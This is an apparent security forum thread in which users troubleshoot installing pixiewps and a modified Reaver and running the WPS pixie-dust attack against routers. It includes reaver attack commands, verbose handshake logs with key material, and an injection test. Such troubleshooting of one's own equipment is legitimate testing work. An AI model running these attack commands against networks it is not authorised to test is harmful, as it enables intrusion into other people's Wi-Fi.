Member
./configureOriginally Posted by soxrok2212
make
make install
i think it overwrite the existing Reaver ( because existing reaver not showing the enrolle/E-HASH stuff but installing modified reaver showing enrolle/E-Hash stuff but not showing PKE).. :/ So i think their is no need to copy reaver in Bin..
Member
See if it compiles and creates the executable. Then try to run it from that folder (no make install)../configure
make
make install
i think it overwrite the existing Reaver ( because existing reaver not showing the enrolle/E-HASH stuff but installing modified reaver showing enrolle/E-Hash stuff but not showing PKE).. :/ So i think their is no need to copy reaver in Bin..
chmod +x configure
./configure
make distclean && ./configure
make
./reaver -i mon0 etc.
Junior Member
Hi,
I cannot install pixiewps, I get the following message:
gcc -std=c99 -o pixiewps pixiewps.c random_r.c -lssl -lcrypto
In file included from pixiewps.c:51:0:
pixiewps.h:66:25: fatal error: openssl/sha.h: No such file or directory
compilation terminated.
make: *** [all] Error 1
I tried this command: gcc -o pixiewps pixiewps.c -lssl -lcrypto and also the recommendation given by mmusket33 but I still have the same problem. I would really appreciate if anybody could help me... Thanks in advance.
Junior Member
@KIMW
pixiewps is now in kali official rep you can install it with "apt-get install pixiewps"
Member
If your kali has been updated as of today may-7, do you have the necessary tools installed and updated to successfully do the pixiewps attack? I have been testing my routers with wps enabled and firewall turned off etc with no luck, I had some luck on a friends dlink when I used the pin but it did not spit out the key. I am attaching what I seem to always get on my broadcom and asus, the zyxel just won't work at all. I am trying both adapters 36neh and the 51nh with no luck. Especially never spits out the Hashes (ehash1 and ehash2) during the transaction. I am thinking I might have a bad installation of something. I have played around with trying different options as well, also read through many tutorials which show people always getting the ehash1 and ehash2 which I never seem to get, maybe all the routers I try are not supported to spit those out....
With the asus n56uroot@kali:~# time reaver -i wlan1mon -c 11 -b A8:39:44:41:10:E0 -K 1 -vv
Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead & Soxrok2212
[+] Switching wlan1mon to channel 11
[+] Waiting for beacon from A8:39:44:41:10:E0
[+] Associated with A8:39:44:41:10:E0 (ESSID: mil0)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: d5:06:2e:f0:0b:f1:39:03:f3:e5:df:fe:c1:9f:cc:fb
[P] PKE: 90:02:ed:eb:04:1b:a3:6a:b4:2a:7f:1b:79:c2:d9:ad:e2 :c2:3b:ab:ff:fa:82:27:c7:2f:e7:6a:91:0f:51:2d:20:e c:9d:02:f7:41:39:b4:c7:be:de:ca:8d:26:0e:af:19:a3: 8a:e4:84:cc:69:02:e8:f9:ec:15:a0:e2:87:32:0c:54:c6 :1c:4e:19:3d:25:02:49:fe:59:25:66:38:83:22:19:23:a a:f5:90:2e:41:b1:53:c4:68:94:ee:ea:a5:f0:4c:d8:d9: ec:c0:1b:85:0c:64:2f:3f:fd:6d:4b:1d:4f:2c:ea:1b:d0 :dd:ee:e5:85:ae:d5:ca:61:05:b0:8a:1d:23:df:b1:b6:f 3:6d:04:78:cd:14:c2:c2:80:48:54:4e:4c:77:91:9e:41: b9:65:94:5f:e9:06:6d:8f:90:d3:28:ff:f0:b7:2e:78:e3 :93:b6:ef:b1:26:43:b0:45:c5:0a:1a:be:20:6c:a5:3c:b e:3b:7e:2c:5e:a1:0b:19:b1
[P] WPS Manufacturer: Broadcom
[P] WPS Model Name: Broadcom
[P] WPS Model Number: 123456
[P] Access Point Serial Number: 1234
[+] Received M1 message
[P] R-Nonce: b0:e6:b2:95:77:cf:66:23:a3:89:be:19:c0:fb:4e:78
[P] PKR: d5:c1:6b:bf:ff:50:8e:67:99:8c:d0:70:1f:7f:1f:60:12 :0b:a8:e3:84:a6:6d:1b:30:1a:81:94:e2:4d:3b:17:bc:d 3:db:64:7b:70:a7:1d:4b:05:2b:1e:39:03:92:79:63:a7: 56:0e:36:7d:af:89:27:7b:95:93:61:8f:e1:a5:b3:db:d1 :a8:6c:fa:05:1a:27:e6:20:18:1c:ed:ca:32:e3:4c:8e:6 1:fd:a2:31:18:6c:80:c8:ad:48:a2:d6:c7:30:6d:24:a1: 35:c1:7b:17:9c:72:e6:f9:67:d7:0b:0e:f6:19:24:58:67 :06:db:a0:23:a5:3e:f2:e8:de:e9:c4:d1:02:68:f9:76:f 6:83:c6:3d:d1:de:7b:fe:46:6b:aa:ca:e9:53:a9:d5:ca: 91:52:a7:08:ed:b1:92:4e:b3:b8:50:3c:32:fd:81:7f:bb :ca:b2:bf:8a:c7:ef:d8:3c:6d:0a:1d:9b:fa:a1:41:38:6 3:f7:a9:9a:4f:47:38:37:de
[P] AuthKey: 53:60:51:4a:9f:af:ad:6b:10:5f:2a:fc:85:d4:f3:38:fc :88:2e:dc:52:f8:f4:5a:de:ee:90:e3:5d:3f:a9:96
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received M3 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 12345670.
^C
[+] Nothing done, nothing to save.
real 0m13.437s
user 0m0.260s
sys 0m0.052s
Should it be sending M3 msg?[+] Associated with E0:3F:49:E3:73:71 (ESSID: MILLA)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[!] WARNING: Failed to associate with E0:3F:49:E3:73:71 (ESSID: MILLA)
[!] WARNING: Failed to associate with E0:3F:49:E3:73:71 (ESSID: MILLA)
[!] WARNING: Failed to associate with E0:3F:49:E3:73:71 (ESSID: MILLA)
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
[P] E-Nonce: 0f:c9:4f:ac:5d:27:4c:06:13:74:6f:05:fc:ec:bb:19
[P] PKE: ca:dc:10:7d:43:a3:ce:9a:9d:7f:0a:45:0f:bf:10:15:30 :6b:83:09:f2:d4:69:37:0a:eb:97:c7:27:56:63:70:a0:6 4:49:11:09:f0:39:3e:af:e9:e3:74:d2:2e:76:2b:52:b4: f6:87:a8:da:26:2c:dc:1a:d9:25:29:03:51:4e:3a:99:49 :32:14:62:8e:73:35:31:4c:21:fa:e7:a7:84:de:98:95:f 1:dc:f7:23:ff:25:d6:b7:fb:c8:0d:52:67:5f:11:96:bf: a3:d4:08:b3:99:7e:51:37:1a:46:4b:a6:6d:88:e1:56:c4 :a5:84:61:1a:a0:e4:f8:db:5c:ab:78:a9:0c:0c:d1:2c:8 e:67:0e:5f:37:ce:07:00:50:6d:6b:d9:e1:df:4c:6b:e2: 3c:f9:f5:85:84:67:54:56:79:61:84:d7:a0:b9:2c:14:02 :33:54:24:68:21:f5:e0:22:6c:00:b4:b3:5d:58:9e:49:9 2:85:06:cf:10:16:c3:3c:e8
[P] WPS Manufacturer: ASUSTeK Computer Inc.
[P] WPS Model Name: WPS Router
[P] WPS Model Number: RT-N56U
[P] Access Point Serial Number: 00000000
[+] Received M1 message
[P] R-Nonce: dd:00:db:6e:84:39:cd:26:d1:7c:bb:42:fa:f6:6b:cf
[P] PKR: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:02
[P] AuthKey: 6a:1e:35:9e:61:a6:13:8b:f9:b5:d1:33:b8:fa:07:e7:10 :80:20:76:9b:1e:d2:15:9e:8e:46:35:d1:65:2b:a8
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
Last edited by undersc0re; 2015-05-07 at 16:55.
Junior Member
I run
sudo reaver -i mon0 -vvv -K 1 -b 02:26:4D:AA:XX:XX
but I never get M3 message (e-hash1 and e-hash2). I tried with several routers and the output from reaver never contains hash1 or hash2.
Any ideas what is wrong?
I configured the router for WPS. It is based on Ralink RT2860. Signal is good (1m distance).
I use a laptop with Intel Centrino Wifi N card and reaver 1.5.2 from github mod by t6_x .
Member
The wireless card probably does not support injection.
Junior Member
It is unreliable, but I think injection works:
sudo aireplay-ng -9 mon0
14:00:37 Trying broadcast probe requests...
14:00:37 Injection is working!
.........
14:00:39 Trying directed probe requests...
14:00:39 84:9C:A6:A7:22:22 - channel: 2 - 'o2-WLAN25'
14:00:39 Ping (min/avg/max): 0.978ms/5.656ms/47.815ms Power: -49.97
14:00:39 30/30: 100%
14:00:39 02:23:08:F9:33:11 - channel: 1 - 'EasyBox-C54211'
14:00:40 Ping (min/avg/max): 0.926ms/7.952ms/44.700ms Power: -43.68
14:00:40 28/30: 93%
Senior Member
Sorry i didn't see your message.
For sure; thank you very much! I send you a mp with my mail.
@ bora.
This is not really a "pixie dust issue" if you don't get a M3... It is an issue for the pixie dust attack but the problem is about how the WPS flow is done.
And more information would be needed to be able to guess where the problem can come from.
Don't worry : It is relliable if areplay-ng -9 works; your card can inject.It is unreliable, but I think injection works:
Junior Member
I have the same problem. Using a 2011 MBP with broadcom drivers.
Any help would be appreciated.
Thanks!
Senior Member
It is not that people don't want to help you but your questions are "offtopic."
It could be an issue with reaver, with your card, with your system configuration or with the access point... etc.
But for sure it has nothing to do with pixiewps : pixiewps needs that you collect the needed strings properly or ti cannot make the brute force of the M3.
How to get the M3 to brute force it with it "authkey" is another question, another subject
Cheers
Posting Permissions
